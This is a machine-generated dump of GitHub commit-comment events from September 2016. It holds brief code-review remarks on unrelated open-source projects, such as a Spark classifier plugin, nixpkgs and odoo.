{"id":"4582952240","type":"CommitCommentEvent","actor":{"login":"varac"},"repo":{"name":"pixelated/puppet-pixelated"},"payload":{"comment":{"id":19077718,"position":20,"line":53,"path":"manifests/tests.pp","commit_id":"0827cd5dd07f2c7f05ff17583a42476a65cbeed6","created_at":"2016-09-19T12:21:47Z","updated_at":"2016-09-19T12:21:47Z","body":"`command =>` and `user    =>` are not neccessary here, but it would be good to ad a comment above this resource so we know from the code that this can get removed in a few month"}},"created_at":"2016-09-19T12:21:47Z"}
{"id":"4582953744","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077719,"position":16,"line":20,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:22:03Z","updated_at":"2016-09-19T12:22:03Z","body":"Can we change the description to : \r\n**featuresToInclude:** A comma-separated sequence of fields to be used for training. If empty, all fields except the label will be used for training. Features to be used, must be from one of the following types: int, long, float or double. Both *featuresToInclude* and *featuresToExclude* fields cannot be specified."}},"created_at":"2016-09-19T12:22:03Z"}
{"id":"4582955402","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19077724,"position":null,"line":null,"path":null,"commit_id":"a01367d24d875e7c00ee42068d63c903f54da9e0","created_at":"2016-09-19T12:22:25Z","updated_at":"2016-09-19T12:22:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KPqeGc5iQle0IaGd40IOaw"}},"created_at":"2016-09-19T12:22:25Z"}
{"id":"4582956127","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077727,"position":19,"line":22,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:22:35Z","updated_at":"2016-09-19T12:22:35Z","body":"Can we change the description to : \r\n**featuresToExclude:** A comma-separated sequence of fields to be excluded when training. If empty, all fields except the label will be used for training. Both *featuresToInclude* and *featuresToExclude* fields cannot be specified."}},"created_at":"2016-09-19T12:22:35Z"}
{"id":"4582956734","type":"CommitCommentEvent","actor":{"login":"varac"},"repo":{"name":"pixelated/puppet-pixelated"},"payload":{"comment":{"id":19077729,"position":3,"line":59,"path":"manifests/tests.pp","commit_id":"4fb819431ef76d6ab47cdf77d8f448bec6a4cd7d","created_at":"2016-09-19T12:22:43Z","updated_at":"2016-09-19T12:22:43Z","body":"looks good, a comment would help so we know still in a few month that we can remove this"}},"created_at":"2016-09-19T12:22:43Z"}
{"id":"4582957204","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19077731,"position":null,"line":null,"path":null,"commit_id":"61859b9d598784f848aebc81283bd059ba26ee7e","created_at":"2016-09-19T12:22:49Z","updated_at":"2016-09-19T12:22:49Z","body":"Indeed. I'll revert it. The reason is that many packages just depend on futures while in fact they should depend on it only when Python != 3. While it is better to fix the expression of those packages, this is a far faster solution."}},"created_at":"2016-09-19T12:22:49Z"}
{"id":"4582958224","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077733,"position":24,"line":27,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:23:03Z","updated_at":"2016-09-19T12:23:03Z","body":"same as classifier"}},"created_at":"2016-09-19T12:23:03Z"}
{"id":"4582958264","type":"CommitCommentEvent","actor":{"login":"kasparsklavins"},"repo":{"name":"Quill88/bigint"},"payload":{"comment":{"id":19077734,"position":null,"line":null,"path":null,"commit_id":"5e8e18d62bc4ffb0c18476d126cdba73971a2c60","created_at":"2016-09-19T12:23:04Z","updated_at":"2016-09-19T12:23:04Z","body":"Do you intend to make a pull request for this?\r\nThis fix for subtraction would be nice, although I do not agree with the division & modulo implementation."}},"created_at":"2016-09-19T12:23:04Z"}
{"id":"4582958529","type":"CommitCommentEvent","actor":{"login":"santiagons"},"repo":{"name":"nogueirasjorge/histora-project"},"payload":{"comment":{"id":19077735,"position":89,"line":null,"path":"app/src/main/assets/model.json","commit_id":"630358972435f24b8d9abb05eb58baeaab06672e","created_at":"2016-09-19T12:23:09Z","updated_at":"2016-09-19T12:23:09Z","body":"You're right. I have just corrected it in 13dd9902702188101e2a80766a022e8784949819"}},"created_at":"2016-09-19T12:23:09Z"}
{"id":"4582959359","type":"CommitCommentEvent","actor":{"login":"Yusufras"},"repo":{"name":"citation-style-language/styles"},"payload":{"comment":{"id":19077736,"position":null,"line":null,"path":null,"commit_id":"d7fa26479d6600707922e3e1bfb0f92647d6050c","created_at":"2016-09-19T12:23:19Z","updated_at":"2016-09-19T12:23:19Z","body":"The latest changes made does not seem to work. I used the link provided.\r\n\r\nFrom: Rintze M. Zelle [mailto:notifications@github.com]\r\nSent: Wednesday, September 7, 2016 6:43 AM\r\nTo: citation-style-language/styles <styles@noreply.github.com>\r\nCc: Ras, Yusuf <yr@sun.ac.za> <yr@sun.ac.za>; Comment <comment@noreply.github.com>\r\nSubject: Re: [citation-style-language/styles] Update south-african-journal-of-animal-science.csl (d7fa264)\r\n\r\n\r\n(No. Further discussed at Yusufras#2 (comment)<https://github.com/Yusufras/styles/pull/2#issuecomment-244860131>)\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/citation-style-language/styles/commit/d7fa26479d6600707922e3e1bfb0f92647d6050c#commitcomment-18922983>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ALMLLUjbOfemM8OZ68eHGcPeGTXOoWFnks5qnkC5gaJpZM4Jzot8>.\r\n\r\nThe integrity and confidentiality of this email is governed by these terms / Hierdie terme bepaal die integriteit en vertroulikheid van hierdie epos. http://www.sun.ac.za/emaildisclaimer\r\n"}},"created_at":"2016-09-19T12:23:19Z"}
{"id":"4582960363","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077739,"position":29,"line":30,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:23:33Z","updated_at":"2016-09-19T12:23:33Z","body":"Can we change this to : \r\nDefault is 2."}},"created_at":"2016-09-19T12:23:33Z"}
{"id":"4582961423","type":"CommitCommentEvent","actor":{"login":"edit-mode"},"repo":{"name":"chromee/soukai-app"},"payload":{"comment":{"id":19077740,"position":30,"line":24,"path":"app/controllers/votes_controller.rb","commit_id":"57245754c85d7c2089ae7d608183711612537ff0","created_at":"2016-09-19T12:23:48Z","updated_at":"2016-09-19T12:23:48Z","body":"DBにユニーク制約を付けて、RecordNotUnique例外を捕捉するべきです。"}},"created_at":"2016-09-19T12:23:48Z"}
{"id":"4582961636","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19077742,"position":5,"line":218,"path":"JMMServer/API/APIv2_core_Module.cs","commit_id":"932eb0cc5d32c103a76241b5a58a259084286c90","created_at":"2016-09-19T12:23:51Z","updated_at":"2016-09-19T12:23:51Z","body":"yeah ;-)\r\n"}},"created_at":"2016-09-19T12:23:51Z"}
{"id":"4582962087","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077743,"position":35,"line":36,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:23:57Z","updated_at":"2016-09-19T12:23:57Z","body":"Won't be required if specified in description"}},"created_at":"2016-09-19T12:23:57Z"}
{"id":"4582964257","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19077748,"position":14,"line":70,"path":"JMMServer/API/Model/APIMessage.cs","commit_id":"932eb0cc5d32c103a76241b5a58a259084286c90","created_at":"2016-09-19T12:24:29Z","updated_at":"2016-09-19T12:24:29Z","body":"as you like :-)"}},"created_at":"2016-09-19T12:24:29Z"}
{"id":"4582965900","type":"CommitCommentEvent","actor":{"login":"serj-lotutovici"},"repo":{"name":"ricamgar/sqlbrite"},"payload":{"comment":{"id":19077757,"position":26,"line":365,"path":"sqlbrite/src/main/java/com/squareup/sqlbrite/BriteDatabase.java","commit_id":"516907971b991e717fa13fccb96cba3270f1f916","created_at":"2016-09-19T12:24:52Z","updated_at":"2016-09-19T12:24:52Z","body":"Should be package private, to avoid synthetic accessor method."}},"created_at":"2016-09-19T12:24:52Z"}
{"id":"4582966543","type":"CommitCommentEvent","actor":{"login":"fredrjo"},"repo":{"name":"fredrjo/Teig"},"payload":{"comment":{"id":19077759,"position":null,"line":null,"path":null,"commit_id":"3f3f5a8cfb97b022a4e61c235f6523e0176c1742","created_at":"2016-09-19T12:25:01Z","updated_at":"2016-09-19T12:25:01Z","body":"TO-01 #test"}},"created_at":"2016-09-19T12:25:01Z"}
{"id":"4582967280","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19077760,"position":null,"line":null,"path":null,"commit_id":"02fdfe77189d73507709f29738b78655f22671bf","created_at":"2016-09-19T12:25:14Z","updated_at":"2016-09-19T12:25:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1046](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13542&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:09:35"}},"created_at":"2016-09-19T12:25:14Z"}
{"id":"4582967469","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19077761,"position":null,"line":null,"path":null,"commit_id":"61859b9d598784f848aebc81283bd059ba26ee7e","created_at":"2016-09-19T12:25:15Z","updated_at":"2016-09-19T12:25:15Z","body":"fixed with 98d16045cc1e648b349b0c2136b89bdc97f76256"}},"created_at":"2016-09-19T12:25:15Z"}
{"id":"4582967753","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077762,"position":39,"line":40,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:25:19Z","updated_at":"2016-09-19T12:25:19Z","body":"This example uses the fields ``text`` and ``impMsg`` from the input record as the features and ``isSpam`` as the label to train the model."}},"created_at":"2016-09-19T12:25:19Z"}
{"id":"4582969346","type":"CommitCommentEvent","actor":{"login":"kirkone"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19077768,"position":null,"line":null,"path":null,"commit_id":"18d656dda34aae2e331ab2c462c6aa328fbd387e","created_at":"2016-09-19T12:25:38Z","updated_at":"2016-09-19T12:25:38Z","body":"This broke the type definition becouse \"component\" is allready defined on line [357](https://github.com/DefinitelyTyped/DefinitelyTyped/blob/18d656dda34aae2e331ab2c462c6aa328fbd387e/angular-ui-bootstrap/angular-ui-bootstrap.d.ts#L357)"}},"created_at":"2016-09-19T12:25:38Z"}
{"id":"4582969433","type":"CommitCommentEvent","actor":{"login":"msmaemae"},"repo":{"name":"msmaemae/AroundWar"},"payload":{"comment":{"id":19077770,"position":null,"line":null,"path":null,"commit_id":"e205af0956bc76dcc491ce1f7aa4f8a828d0a32b","created_at":"2016-09-19T12:25:40Z","updated_at":"2016-09-19T12:25:40Z","body":"SERVER MC-GG-SERVER-TH"}},"created_at":"2016-09-19T12:25:40Z"}
{"id":"4582970575","type":"CommitCommentEvent","actor":{"login":"lamht1994"},"repo":{"name":"truonganhhoang/int3117-2016"},"payload":{"comment":{"id":19077775,"position":11,"line":11,"path":"HoangTungLam/BT1/README.md","commit_id":"47151440e63156abd8999c6cd43d885813a96f56","created_at":"2016-09-19T12:25:56Z","updated_at":"2016-09-19T12:25:56Z","body":"Homework 2: Kiem thu\r\n"}},"created_at":"2016-09-19T12:25:56Z"}
{"id":"4582971759","type":"CommitCommentEvent","actor":{"login":"foghina"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19077779,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-19T12:26:12Z","updated_at":"2016-09-19T12:26:12Z","body":"@eronisko thanks for the heads-up, I'll update the docs."}},"created_at":"2016-09-19T12:26:12Z"}
{"id":"4582975178","type":"CommitCommentEvent","actor":{"login":"VladimirEperjesi"},"repo":{"name":"VladimirEperjesi/tst"},"payload":{"comment":{"id":19077785,"position":null,"line":null,"path":null,"commit_id":"557041a7802814eb105275945790b37aea312871","created_at":"2016-09-19T12:26:58Z","updated_at":"2016-09-19T12:26:58Z","body":"hello"}},"created_at":"2016-09-19T12:26:58Z"}
{"id":"4582975689","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077787,"position":43,"line":62,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionClassifier.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:27:06Z","updated_at":"2016-09-19T12:27:06Z","body":"Not sure if the constructor is required."}},"created_at":"2016-09-19T12:27:06Z"}
{"id":"4582976207","type":"CommitCommentEvent","actor":{"login":"breatheloud"},"repo":{"name":"breatheloud/breatheloud.github.io"},"payload":{"comment":{"id":19077788,"position":null,"line":null,"path":null,"commit_id":"c10f751bb53ded0c10a23e315654ab6b1d5e05bc","created_at":"2016-09-19T12:27:13Z","updated_at":"2016-09-19T12:27:13Z","body":"Do i always have to comment to commit?"}},"created_at":"2016-09-19T12:27:13Z"}
{"id":"4582979047","type":"CommitCommentEvent","actor":{"login":"jhsx"},"repo":{"name":"CloudyKit/goTemplateBenchmark"},"payload":{"comment":{"id":19077790,"position":null,"line":null,"path":null,"commit_id":"831a75c87cfd49490c437a47c1283bba9a7bfe06","created_at":"2016-09-19T12:27:50Z","updated_at":"2016-09-19T12:27:50Z","body":"Nice 👍 "}},"created_at":"2016-09-19T12:27:50Z"}
{"id":"4582980015","type":"CommitCommentEvent","actor":{"login":"AxelMatstoms"},"repo":{"name":"ALI-Team/IshJava"},"payload":{"comment":{"id":19077792,"position":null,"line":null,"path":null,"commit_id":"34bf53702b2907df4179af525056cbd8690a39c1","created_at":"2016-09-19T12:28:02Z","updated_at":"2016-09-19T12:28:02Z","body":"productive"}},"created_at":"2016-09-19T12:28:02Z"}
{"id":"4582981640","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077794,"position":88,"line":97,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionClassifier.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:28:26Z","updated_at":"2016-09-19T12:28:26Z","body":"Can we add @Nullable before the nullable fields."}},"created_at":"2016-09-19T12:28:26Z"}
{"id":"4582982703","type":"CommitCommentEvent","actor":{"login":"on1989"},"repo":{"name":"on1989/AvtoFix-1"},"payload":{"comment":{"id":19077798,"position":null,"line":null,"path":null,"commit_id":"157f8c3a9e5695ce2e10fa82b82720d152e5ac34","created_at":"2016-09-19T12:28:41Z","updated_at":"2016-09-19T12:28:41Z","body":"last"}},"created_at":"2016-09-19T12:28:41Z"}
{"id":"4582987054","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":19077810,"position":28,"line":347,"path":"connection.cc","commit_id":"8b15bbcbc8ce551435a450068584655469341b76","created_at":"2016-09-19T12:29:42Z","updated_at":"2016-09-19T12:29:42Z","body":"We catch all QXmpp debug messages, not only stanzas. E.g. https://github.com/qxmpp-project/qxmpp/blob/master/src/client/QXmppTransferManager.cpp#L484\r\n\r\nThere is a hundred of usages outside of  QXmppStream.\r\nWe can split messages by its type: sent and received stanzas types are ```QXmppLogger::ReceivedMessage``` and ```QXmppLogger::SentMessage```.\r\n\r\nThat said, I'm suggesting to introduce two categories: qxmpp.stanza and qxmpp.generic. In future we can add subcategories ```qxmpp.stanza.received``` and ```qxmpp.stanza.sent```."}},"created_at":"2016-09-19T12:29:42Z"}
{"id":"4582990438","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":19077818,"position":4,"line":22,"path":"common.cc","commit_id":"08380f1d17ed31516281fc2a377d7fb3b76c9d82","created_at":"2016-09-19T12:30:27Z","updated_at":"2016-09-19T12:30:27Z","body":"```nonsense.tracing```?"}},"created_at":"2016-09-19T12:30:27Z"}
{"id":"4582990680","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077819,"position":123,"line":123,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionClassifier.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:30:30Z","updated_at":"2016-09-19T12:30:30Z","body":"Since variables initialized in configurePipeline do not retain their value, we can use outputSchema directly instead of assigning it any value on line 122 "}},"created_at":"2016-09-19T12:30:30Z"}
{"id":"4583002293","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19077844,"position":5,"line":78,"path":"addons/mrp/wizard/mrp_product_produce.py","commit_id":"962a207f6abe3b23178dbfc0fd6df28ec2bfa897","created_at":"2016-09-19T12:33:06Z","updated_at":"2016-09-19T12:33:06Z","body":"this should be in another commit. also negative produce values could make sense. i'll discuss it with bst\r\ni thing only produce 0 should be prevented"}},"created_at":"2016-09-19T12:33:06Z"}
{"id":"4583002900","type":"CommitCommentEvent","actor":{"login":"mge-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19077845,"position":4,"line":71,"path":"odoo/addons/base/ir/ir_ui_menu.py","commit_id":"4964656f46f333d566e42655c5584975aa04f6b3","created_at":"2016-09-19T12:33:14Z","updated_at":"2016-09-19T12:33:14Z","body":"to comment in code"}},"created_at":"2016-09-19T12:33:14Z"}
{"id":"4583003493","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077847,"position":191,"line":160,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionClassifier.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:33:22Z","updated_at":"2016-09-19T12:33:22Z","body":"Features can be null and hence String.valueOf(structuredRecord.get(column)) can result in NPE"}},"created_at":"2016-09-19T12:33:22Z"}
{"id":"4583008196","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077861,"position":191,"line":160,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionClassifier.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:34:25Z","updated_at":"2016-09-19T12:34:25Z","body":"Also, according to the latest discussion the plugins will receive features only of type : int, long, float or double.\r\nSo we can remove this block."}},"created_at":"2016-09-19T12:34:25Z"}
{"id":"4583009775","type":"CommitCommentEvent","actor":{"login":"dimsaf"},"repo":{"name":"dimsaf/My-Java-codes"},"payload":{"comment":{"id":19077866,"position":null,"line":null,"path":null,"commit_id":"0b73ba97360c66ce6188d453e9c4496eb9be319c","created_at":"2016-09-19T12:34:47Z","updated_at":"2016-09-19T12:34:47Z","body":"This is repository for my Java codes"}},"created_at":"2016-09-19T12:34:47Z"}
{"id":"4583011140","type":"CommitCommentEvent","actor":{"login":"htobon"},"repo":{"name":"CCAFS/MARLO-CIAT"},"payload":{"comment":{"id":19077874,"position":8,"line":8,"path":"marlo-ciat/pom.xml","commit_id":"1e6b007564d6b72f6161be489623aafde645cf0b","created_at":"2016-09-19T12:35:07Z","updated_at":"2016-09-19T12:35:07Z","body":"\"marlo\""}},"created_at":"2016-09-19T12:35:07Z"}
{"id":"4583017334","type":"CommitCommentEvent","actor":{"login":"DeveloperSpawn"},"repo":{"name":"DeveloperSpawn/Site-Bootstrap"},"payload":{"comment":{"id":19077893,"position":null,"line":null,"path":null,"commit_id":"9800935790a0b622933ef713a6374f4e168ab156","created_at":"2016-09-19T12:36:31Z","updated_at":"2016-09-19T12:36:31Z","body":"\r\n[Bootstrap.zip](https://github.com/DeveloperSpawn/Site-Bootstrap/files/479953/Bootstrap.zip)\r\n"}},"created_at":"2016-09-19T12:36:31Z"}
{"id":"4583019917","type":"CommitCommentEvent","actor":{"login":"Hanwun"},"repo":{"name":"NTHU-EE-CV-2015-Fall/homework0"},"payload":{"comment":{"id":19077898,"position":3,"line":12,"path":"README.md","commit_id":"5800e5ac17a7a917fd17337e260524a20c371b5e","created_at":"2016-09-19T12:37:09Z","updated_at":"2016-09-19T12:37:09Z","body":"My name is Han-Wen Lien, a first-year master of EE, currently doing the search on voice signal processing.  I have experience of the subjects of probability and linear algebra.  About the new course, I believe those can let me learn more and more."}},"created_at":"2016-09-19T12:37:09Z"}
{"id":"4583021004","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077900,"position":200,"line":169,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionClassifier.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:37:22Z","updated_at":"2016-09-19T12:37:22Z","body":"Lines 167-169 can be combined using : \r\n`outputSchema = (outputSchema != null) ? outputSchema : SparkUtils.getOutputSchema(inputSchema, config.predictionField);`\r\n "}},"created_at":"2016-09-19T12:37:22Z"}
{"id":"4583022534","type":"CommitCommentEvent","actor":{"login":"itdependsnetworks"},"repo":{"name":"phpipam/phpipam"},"payload":{"comment":{"id":19077905,"position":null,"line":null,"path":null,"commit_id":"f2783556407528d2498808c481c08fbecbe97cd9","created_at":"2016-09-19T12:37:42Z","updated_at":"2016-09-19T12:37:42Z","body":"Good stuff. I've been meaning to go back to function `search_available_subnets` and optimize that. I know their is some inefficiencies there, but never got around to cleaning it up. Should be a way to not have to iterate every subnet. E.g. iterate /24, first /25 is free, no reason to check /26, /27, etc... on .0 network. \r\n\r\nMaybe this will motivate me. : )"}},"created_at":"2016-09-19T12:37:42Z"}
{"id":"4583022943","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19077906,"position":null,"line":null,"path":null,"commit_id":"962a207f6abe3b23178dbfc0fd6df28ec2bfa897","created_at":"2016-09-19T12:37:47Z","updated_at":"2016-09-19T12:37:47Z","body":"\r\n\r\n[FIX] mrp: \"produce\" should set the MO to \"in progress\" state\r\n\r\neven if there isn't any work orders associated."}},"created_at":"2016-09-19T12:37:47Z"}
{"id":"4583024520","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077911,"position":223,"line":181,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionClassifier.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:38:09Z","updated_at":"2016-09-19T12:38:09Z","body":"This is not being used. Can be removed."}},"created_at":"2016-09-19T12:38:09Z"}
{"id":"4583025461","type":"CommitCommentEvent","actor":{"login":"veryyoung"},"repo":{"name":"veryyoung/QQLuckyMoney"},"payload":{"comment":{"id":19077915,"position":null,"line":null,"path":null,"commit_id":"fcc2c748c6a3d8b57b715b18adae0e827c92d48e","created_at":"2016-09-19T12:38:20Z","updated_at":"2016-09-19T12:38:20Z","body":"@vlucky123 参考 https://github.com/veryyoung/WechatLuckyMoney/issues/13"}},"created_at":"2016-09-19T12:38:20Z"}
{"id":"4583025658","type":"CommitCommentEvent","actor":{"login":"Atyaf-dhari"},"repo":{"name":"Maimit/Cloud-Computing"},"payload":{"comment":{"id":19077916,"position":null,"line":null,"path":null,"commit_id":"f0f49f412d90367c3c155f4937223050daca9ce0","created_at":"2016-09-19T12:38:22Z","updated_at":"2016-09-19T12:38:22Z","body":"this project code don't implemented in cloudsim there is class named 'first 'not found?\r\nplease can you help ? \r\nwhere can i find the paper of  this project?"}},"created_at":"2016-09-19T12:38:22Z"}
{"id":"4583026804","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19077919,"position":24,"line":245,"path":"scripts/interaction.js","commit_id":"999c10c80a8398351c153cced999c03964b4879b","created_at":"2016-09-19T12:38:36Z","updated_at":"2016-09-19T12:38:36Z","body":"Yes, I agree"}},"created_at":"2016-09-19T12:38:36Z"}
{"id":"4583028318","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077923,"position":10,"line":40,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionTrainer.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:38:55Z","updated_at":"2016-09-19T12:38:55Z","body":"import org.apache.avro.reflect.Nullable; is mistakenly included instead of javax.annotation"}},"created_at":"2016-09-19T12:38:55Z"}
{"id":"4583031406","type":"CommitCommentEvent","actor":{"login":"hdavid"},"repo":{"name":"hdavid/Launchpad95"},"payload":{"comment":{"id":19077934,"position":32,"line":1054,"path":"StepSequencerComponent.py","commit_id":"6c48c371f1f0a9236d99db8a0bef06732fdc5ad9","created_at":"2016-09-19T12:39:31Z","updated_at":"2016-09-19T12:39:31Z","body":"true. okay then !"}},"created_at":"2016-09-19T12:39:31Z"}
{"id":"4583032631","type":"CommitCommentEvent","actor":{"login":"renjunshuai"},"repo":{"name":"lovewinner/tptest"},"payload":{"comment":{"id":19077937,"position":null,"line":null,"path":null,"commit_id":"4c090c0ddb9ed428128e9f3b438cf4b819fc2714","created_at":"2016-09-19T12:39:46Z","updated_at":"2016-09-19T12:39:46Z","body":"aaa"}},"created_at":"2016-09-19T12:39:46Z"}
{"id":"4583034933","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077943,"position":28,"line":60,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/LogisticRegressionTrainer.java","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:40:17Z","updated_at":"2016-09-19T12:40:17Z","body":"not sure if this is required."}},"created_at":"2016-09-19T12:40:17Z"}
{"id":"4583039528","type":"CommitCommentEvent","actor":{"login":"bzin"},"repo":{"name":"Respondens/coding-standards"},"payload":{"comment":{"id":19077949,"position":null,"line":null,"path":null,"commit_id":"b1c82b859c043dadfc79367acdf5f01b635bf33e","created_at":"2016-09-19T12:41:12Z","updated_at":"2016-09-19T12:41:12Z","body":"Good stuff @lode ! We are thinking on doing this as well for Momkai code. :)"}},"created_at":"2016-09-19T12:41:12Z"}
{"id":"4583041622","type":"CommitCommentEvent","actor":{"login":"litherum"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19077951,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T12:41:37Z","updated_at":"2016-09-19T12:41:37Z","body":"The question is: in the following, which one wins?\r\n\r\nRequest: font-weight: 700\r\n\r\nPossible @font-face block declarations (in order):\r\nfont-weight: 699-751\r\nfont-weight: 649-701\r\nfont-weight: 649-751\r\n\r\nSimilarly, If the request is 700 but the possible declarations are\r\nfont-weight: 800-801\r\nfont-weight: 800-900\r\n\r\nThe question gets even harder if the request/declarations is/are around 400 & 500."}},"created_at":"2016-09-19T12:41:37Z"}
{"id":"4583042960","type":"CommitCommentEvent","actor":{"login":"advir1"},"repo":{"name":"7thsky/openvv"},"payload":{"comment":{"id":19077955,"position":11,"line":39,"path":"src/org/openvv/js/OVVAsset.js","commit_id":"0d1077a01dd0678519cb9e6524587d9fcb3ed51f","created_at":"2016-09-19T12:41:52Z","updated_at":"2016-09-19T12:41:52Z","body":"set to true by mistake?"}},"created_at":"2016-09-19T12:41:52Z"}
